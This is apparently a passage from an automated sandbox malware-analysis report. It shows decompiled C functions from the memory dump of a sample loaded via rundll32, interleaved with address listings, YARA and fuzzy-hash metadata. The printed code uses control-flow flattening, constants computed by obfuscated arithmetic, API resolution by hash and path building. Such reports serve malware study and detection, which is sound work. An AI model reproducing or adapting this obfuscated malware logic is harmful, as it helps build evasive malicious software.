				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E002C912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x2e3e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E002D8F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E002CE249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E002C42C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E002D8F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                                    0x002d473c
                                                                                                                                    0x002d473f
                                                                                                                                    0x002d4749
                                                                                                                                    0x002d4751
                                                                                                                                    0x002d475a
                                                                                                                                    0x002d475c
                                                                                                                                    0x002d4760
                                                                                                                                    0x002d4768
                                                                                                                                    0x002d4770
                                                                                                                                    0x002d4778
                                                                                                                                    0x002d4780
                                                                                                                                    0x002d4788
                                                                                                                                    0x002d4793
                                                                                                                                    0x002d4798
                                                                                                                                    0x002d479e
                                                                                                                                    0x002d47a3
                                                                                                                                    0x002d47ab
                                                                                                                                    0x002d47b8
                                                                                                                                    0x002d47bb
                                                                                                                                    0x002d47bf
                                                                                                                                    0x002d47c7
                                                                                                                                    0x002d47cf
                                                                                                                                    0x002d47d7
                                                                                                                                    0x002d47db
                                                                                                                                    0x002d47e0
                                                                                                                                    0x002d47e1
                                                                                                                                    0x002d47e5
                                                                                                                                    0x002d47ed
                                                                                                                                    0x002d47f5
                                                                                                                                    0x002d4803
                                                                                                                                    0x002d4807
                                                                                                                                    0x002d480f
                                                                                                                                    0x002d481c
                                                                                                                                    0x002d4820
                                                                                                                                    0x002d4828
                                                                                                                                    0x002d4830
                                                                                                                                    0x002d4838
                                                                                                                                    0x002d4840
                                                                                                                                    0x002d4848
                                                                                                                                    0x002d4850
                                                                                                                                    0x002d4858
                                                                                                                                    0x002d4862
                                                                                                                                    0x002d4866
                                                                                                                                    0x002d486e
                                                                                                                                    0x002d4876
                                                                                                                                    0x002d487e
                                                                                                                                    0x002d4886
                                                                                                                                    0x002d488e
                                                                                                                                    0x002d489b
                                                                                                                                    0x002d489f
                                                                                                                                    0x002d48a7
                                                                                                                                    0x002d48af
                                                                                                                                    0x002d48b4
                                                                                                                                    0x002d48b9
                                                                                                                                    0x002d48c1
                                                                                                                                    0x002d48c9
                                                                                                                                    0x002d48d1
                                                                                                                                    0x002d48d9
                                                                                                                                    0x002d48e1
                                                                                                                                    0x002d48e9
                                                                                                                                    0x002d48f1
                                                                                                                                    0x002d48f9
                                                                                                                                    0x002d4901
                                                                                                                                    0x002d4909
                                                                                                                                    0x002d4910
                                                                                                                                    0x002d4915
                                                                                                                                    0x002d491d
                                                                                                                                    0x002d4925
                                                                                                                                    0x002d492d
                                                                                                                                    0x002d4935
                                                                                                                                    0x002d4944
                                                                                                                                    0x002d4947
                                                                                                                                    0x002d494b
                                                                                                                                    0x002d4955
                                                                                                                                    0x002d4959
                                                                                                                                    0x002d4961
                                                                                                                                    0x002d4969
                                                                                                                                    0x002d4971
                                                                                                                                    0x002d4976
                                                                                                                                    0x002d497e
                                                                                                                                    0x002d498e
                                                                                                                                    0x002d4992
                                                                                                                                    0x002d499a
                                                                                                                                    0x002d49a2
                                                                                                                                    0x002d49aa
                                                                                                                                    0x002d49b2
                                                                                                                                    0x002d49ba
                                                                                                                                    0x002d49bf
                                                                                                                                    0x002d49c7
                                                                                                                                    0x002d49cf
                                                                                                                                    0x002d49d7
                                                                                                                                    0x002d49df
                                                                                                                                    0x002d49eb
                                                                                                                                    0x002d49ee
                                                                                                                                    0x002d49f2
                                                                                                                                    0x002d49f6
                                                                                                                                    0x002d49fa
                                                                                                                                    0x002d4a03
                                                                                                                                    0x002d4a0b
                                                                                                                                    0x002d4a13
                                                                                                                                    0x002d4a18
                                                                                                                                    0x002d4a20
                                                                                                                                    0x002d4a28
                                                                                                                                    0x002d4a28
                                                                                                                                    0x002d4a28
                                                                                                                                    0x002d4a2b
                                                                                                                                    0x002d4a3d
                                                                                                                                    0x002d4b36
                                                                                                                                    0x002d4b3b
                                                                                                                                    0x002d4b3d
                                                                                                                                    0x002d4b42
                                                                                                                                    0x002d4b44
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4b44
                                                                                                                                    0x002d4a43
                                                                                                                                    0x002d4a49
                                                                                                                                    0x002d4b16
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4a4f
                                                                                                                                    0x002d4a55
                                                                                                                                    0x002d4af9
                                                                                                                                    0x002d4aff
                                                                                                                                    0x002d4b07
                                                                                                                                    0x002d4b04
                                                                                                                                    0x002d4b04
                                                                                                                                    0x002d4b0c
                                                                                                                                    0x002d4b0f
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4a5b
                                                                                                                                    0x002d4a61
                                                                                                                                    0x002d4aea
                                                                                                                                    0x002d4aef
                                                                                                                                    0x002d4af2
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4a63
                                                                                                                                    0x002d4a65
                                                                                                                                    0x002d4ab7
                                                                                                                                    0x002d4abe
                                                                                                                                    0x002d4ac4
                                                                                                                                    0x002d4ac7
                                                                                                                                    0x002d4acc
                                                                                                                                    0x002d4ace
                                                                                                                                    0x002d4acf
                                                                                                                                    0x002d4acf
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4a67
                                                                                                                                    0x002d4a6d
                                                                                                                                    0x002d4b71
                                                                                                                                    0x002d4b77
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4a73
                                                                                                                                    0x002d4a8f
                                                                                                                                    0x002d4a91
                                                                                                                                    0x002d4a9b
                                                                                                                                    0x002d4aa0
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4aa0
                                                                                                                                    0x002d4a6d
                                                                                                                                    0x002d4a65
                                                                                                                                    0x002d4a61
                                                                                                                                    0x002d4a55
                                                                                                                                    0x002d4a49
                                                                                                                                    0x002d4b86
                                                                                                                                    0x002d4b86
                                                                                                                                    0x002d4b5c
                                                                                                                                    0x002d4b61
                                                                                                                                    0x002d4b64
                                                                                                                                    0x002d4b69
                                                                                                                                    0x002d4b70
                                                                                                                                    0x00000000
                                                                                                                                    0x002d4b70

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ^T$mU`
                                                                                                                                    • API String ID: 0-1245783925
                                                                                                                                    • Opcode ID: dba1064687c93ef310c92f02c295dc3b2202115afa74cfdd1b1dcf4c2ffe5b3f
                                                                                                                                    • Instruction ID: d9afa6a18707ffda83c23a09275d54acf1b3b075dc50a67f8dea2797518ee7c6
                                                                                                                                    • Opcode Fuzzy Hash: dba1064687c93ef310c92f02c295dc3b2202115afa74cfdd1b1dcf4c2ffe5b3f
                                                                                                                                    • Instruction Fuzzy Hash: 40B140715183419FC318DF25899A41BFBE1FBC8748F108A1EF69A96260D3B1CA59CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DA666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DA666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E002DDCF7(_v148, 0x2c1540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E002CA42D(0xab2a8d8a, 0x2b7)))();
								E002CA8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E002D0AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E002C80E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E002D8519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E002C7FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E002C4816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                                    0x002da666
                                                                                                                                    0x002da666
                                                                                                                                    0x002da670
                                                                                                                                    0x002da674
                                                                                                                                    0x002da67e
                                                                                                                                    0x002da68b
                                                                                                                                    0x002da68f
                                                                                                                                    0x002da694
                                                                                                                                    0x002da699
                                                                                                                                    0x002da6a1
                                                                                                                                    0x002da6a9
                                                                                                                                    0x002da6b1
                                                                                                                                    0x002da6b9
                                                                                                                                    0x002da6c1
                                                                                                                                    0x002da6c6
                                                                                                                                    0x002da6ce
                                                                                                                                    0x002da6d6
                                                                                                                                    0x002da6de
                                                                                                                                    0x002da6e6
                                                                                                                                    0x002da6ea
                                                                                                                                    0x002da6ef
                                                                                                                                    0x002da6f7
                                                                                                                                    0x002da706
                                                                                                                                    0x002da709
                                                                                                                                    0x002da70d
                                                                                                                                    0x002da715
                                                                                                                                    0x002da71d
                                                                                                                                    0x002da722
                                                                                                                                    0x002da732
                                                                                                                                    0x002da736
                                                                                                                                    0x002da73e
                                                                                                                                    0x002da746
                                                                                                                                    0x002da74e
                                                                                                                                    0x002da756
                                                                                                                                    0x002da75e
                                                                                                                                    0x002da766
                                                                                                                                    0x002da76e
                                                                                                                                    0x002da776
                                                                                                                                    0x002da783
                                                                                                                                    0x002da786
                                                                                                                                    0x002da78a
                                                                                                                                    0x002da792
                                                                                                                                    0x002da79a
                                                                                                                                    0x002da7a2
                                                                                                                                    0x002da7aa
                                                                                                                                    0x002da7b2
                                                                                                                                    0x002da7ba
                                                                                                                                    0x002da7c2
                                                                                                                                    0x002da7cf
                                                                                                                                    0x002da7d3
                                                                                                                                    0x002da7db
                                                                                                                                    0x002da7e3
                                                                                                                                    0x002da7eb
                                                                                                                                    0x002da7f3
                                                                                                                                    0x002da7f8
                                                                                                                                    0x002da800
                                                                                                                                    0x002da810
                                                                                                                                    0x002da818
                                                                                                                                    0x002da81b
                                                                                                                                    0x002da81f
                                                                                                                                    0x002da827
                                                                                                                                    0x002da82f
                                                                                                                                    0x002da83c
                                                                                                                                    0x002da842
                                                                                                                                    0x002da847
                                                                                                                                    0x002da84f
                                                                                                                                    0x002da857
                                                                                                                                    0x002da85c
                                                                                                                                    0x002da864
                                                                                                                                    0x002da86c
                                                                                                                                    0x002da874
                                                                                                                                    0x002da879
                                                                                                                                    0x002da881
                                                                                                                                    0x002da890
                                                                                                                                    0x002da891
                                                                                                                                    0x002da895
                                                                                                                                    0x002da89d
                                                                                                                                    0x002da8ab
                                                                                                                                    0x002da8af
                                                                                                                                    0x002da8b3
                                                                                                                                    0x002da8b7
                                                                                                                                    0x002da8bb
                                                                                                                                    0x002da8c3
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8cb
                                                                                                                                    0x002da8d0
                                                                                                                                    0x002da8d0
                                                                                                                                    0x002da8de
                                                                                                                                    0x002da983
                                                                                                                                    0x002da98c
                                                                                                                                    0x002da994
                                                                                                                                    0x002da99b
                                                                                                                                    0x002da9a7
                                                                                                                                    0x002da9a8
                                                                                                                                    0x002da9a9
                                                                                                                                    0x002da9aa
                                                                                                                                    0x002da9b6
                                                                                                                                    0x002da9c2
                                                                                                                                    0x002da9c7
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8e4
                                                                                                                                    0x002da8ea
                                                                                                                                    0x002da952
                                                                                                                                    0x002da957
                                                                                                                                    0x002da95f
                                                                                                                                    0x002da969
                                                                                                                                    0x002da96a
                                                                                                                                    0x002da96b
                                                                                                                                    0x002da96d
                                                                                                                                    0x002da972
                                                                                                                                    0x002da977
                                                                                                                                    0x002da977
                                                                                                                                    0x002da97a
                                                                                                                                    0x002da97a
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8ec
                                                                                                                                    0x002da8f2
                                                                                                                                    0x002da93f
                                                                                                                                    0x00000000
                                                                                                                                    0x002da8f4
                                                                                                                                    0x002da8fa
                                                                                                                                    0x002daa1d
                                                                                                                                    0x002da900
                                                                                                                                    0x002da906
                                                                                                                                    0x00000000
                                                                                                                                    0x002da90c
                                                                                                                                    0x002da910
                                                                                                                                    0x002da91f
                                                                                                                                    0x002da920
                                                                                                                                    0x002da926
                                                                                                                                    0x002da930
                                                                                                                                    0x002da936
                                                                                                                                    0x002da93a
                                                                                                                                    0x00000000
                                                                                                                                    0x002da93a
                                                                                                                                    0x002da906
                                                                                                                                    0x002da8fa
                                                                                                                                    0x002da8f2
                                                                                                                                    0x002da8ea
                                                                                                                                    0x002daa26
                                                                                                                                    0x002daa2f
                                                                                                                                    0x002daa2f
                                                                                                                                    0x002da9e8
                                                                                                                                    0x002da9ea
                                                                                                                                    0x002da9ed
                                                                                                                                    0x002da9ef
                                                                                                                                    0x002da9f8
                                                                                                                                    0x002da9fc
                                                                                                                                    0x002daa01
                                                                                                                                    0x00000000
                                                                                                                                    0x002da9f1
                                                                                                                                    0x002da9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002da9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002daa06
                                                                                                                                    0x002daa06
                                                                                                                                    0x002daa06
                                                                                                                                    0x00000000
                                                                                                                                    0x002daa12

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ^4?$iQ
                                                                                                                                    • API String ID: 0-3971506469
                                                                                                                                    • Opcode ID: 1c1d292d2d67ac339d054ba52c878640336f522c9ce08149e9d33dab672480b3
                                                                                                                                    • Instruction ID: 9950470580f5139cbedc9f46216b0c498a5cf005f3de3ecb08e3d12d345064b2
                                                                                                                                    • Opcode Fuzzy Hash: 1c1d292d2d67ac339d054ba52c878640336f522c9ce08149e9d33dab672480b3
                                                                                                                                    • Instruction Fuzzy Hash: 0BA151719183409FC354CF29D58990BFBE1BBC4758F40892EF99AA7260C7B5D9498F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D8BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E002D8BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x2e3e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E002C80E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E002DD25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E002D0AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E002C80E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E002D0AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E002C80E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E002C80E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                                    0x002d8be9
                                                                                                                                    0x002d8bf9
                                                                                                                                    0x002d8bfa
                                                                                                                                    0x002d8c01
                                                                                                                                    0x002d8c04
                                                                                                                                    0x002d8c05
                                                                                                                                    0x002d8c06
                                                                                                                                    0x002d8c0c
                                                                                                                                    0x002d8c13
                                                                                                                                    0x002d8c16
                                                                                                                                    0x002d8c1d
                                                                                                                                    0x002d8c24
                                                                                                                                    0x002d8c2b
                                                                                                                                    0x002d8c32
                                                                                                                                    0x002d8c40
                                                                                                                                    0x002d8c47
                                                                                                                                    0x002d8c4a
                                                                                                                                    0x002d8c4d
                                                                                                                                    0x002d8c54
                                                                                                                                    0x002d8c5b
                                                                                                                                    0x002d8c69
                                                                                                                                    0x002d8c6c
                                                                                                                                    0x002d8c73
                                                                                                                                    0x002d8c7a
                                                                                                                                    0x002d8c81
                                                                                                                                    0x002d8c85
                                                                                                                                    0x002d8c8c
                                                                                                                                    0x002d8c93
                                                                                                                                    0x002d8c9a
                                                                                                                                    0x002d8c9e
                                                                                                                                    0x002d8ca5
                                                                                                                                    0x002d8cac
                                                                                                                                    0x002d8cb4
                                                                                                                                    0x002d8cb7
                                                                                                                                    0x002d8cba
                                                                                                                                    0x002d8cc1
                                                                                                                                    0x002d8ccf
                                                                                                                                    0x002d8cd2
                                                                                                                                    0x002d8cd9
                                                                                                                                    0x002d8ce0
                                                                                                                                    0x002d8ce7
                                                                                                                                    0x002d8cee
                                                                                                                                    0x002d8cf5
                                                                                                                                    0x002d8cff
                                                                                                                                    0x002d8d02
                                                                                                                                    0x002d8d05
                                                                                                                                    0x002d8d0c
                                                                                                                                    0x002d8d13
                                                                                                                                    0x002d8d17
                                                                                                                                    0x002d8d1e
                                                                                                                                    0x002d8d25
                                                                                                                                    0x002d8d2c
                                                                                                                                    0x002d8d33
                                                                                                                                    0x002d8d3a
                                                                                                                                    0x002d8d3e
                                                                                                                                    0x002d8d42
                                                                                                                                    0x002d8d49
                                                                                                                                    0x002d8d50
                                                                                                                                    0x002d8d57
                                                                                                                                    0x002d8d5b
